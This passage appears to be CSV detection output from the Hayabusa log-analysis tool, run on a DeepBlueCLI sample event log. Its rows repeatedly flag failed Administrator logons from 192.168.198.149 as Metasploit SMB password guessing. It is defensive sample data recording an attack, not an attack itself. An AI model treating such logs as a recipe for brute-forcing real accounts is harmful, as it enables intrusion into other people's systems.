NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.113 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 81xZ7iisEyTABmUm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.153 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.187 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qYiQ2xjMQFQwH2XY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.187 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eRN8e3yzZzxc2p3A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QCa6PN0C7XznvipG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.275 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.311 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hFqjIXbEb7eWUFUi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.311 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FkrVjLgnJZlIyXpk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 2r5tyuIYijAXN5be : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AgjQNe9hQrLIETDn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.442 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KRNoInpFTsixZDIu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ladJUS6I0HMIwdef : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.523 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6oW63pJlVtjgn3YY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.556 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xKNu8b2To2Y1twUr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q9sN5xm3GytfmM7G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FtQQS61GYBm6WUUz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.684 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3WxxawZZMhNCGHxc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sKP8G2VgJlrr9LMR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.764 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: VvOsNQpk3c5p1FgK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H7oz7NPh5Z8UrDPW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.839 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.890 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvzNFOLBlBv98Do4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.890 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8KJmYytO30Icc6Rb : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.932 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.962 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zro3jLjFXWZ2o8VL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.962 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Z2J8VYeuxd9fKcG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.999 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pXMjOKLfMex7OmMv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.048 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cgbm3YeoGxCa22Il : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.123 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7MEstBFjiWhVE18 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.123 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y8Y2kDEiMZWf0znn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.176 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: zBAFVgPIOyCvtdRs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.213 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s3pFhUcspF6lzQXN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.253 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 39LFXXW715pQoADC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.297 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: in4ewyxouUnxQzCQ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.341 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zOtV8CLIU6Mcw2ty : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.374 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.412 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b8NJqimhGrg9uhTh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.412 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XEWLTOY9magV0h6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Di1MZsJx52Bi8E6k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.497 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 22MdB2QodynfibkF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.536 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qojej3YITXvXJ6Pe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: CLjbQ6timbdQoufd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.618 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aZgoAnGEFwXN88bQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.653 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NZFWoL9XUMJdfNnY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.698 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.747 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x000TRnXfVtPAQSE : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.747 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HNHWWHDOpXQyNdrR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1irbPdOoUfvq1MXd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.861 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dCflbKOMPJRXQHsD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.906 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zuy6nD4EXeGzEy5e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.942 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xkig4u0LIS9v3HMK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.984 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 94RbUrUcMf6VhP8A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.029 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
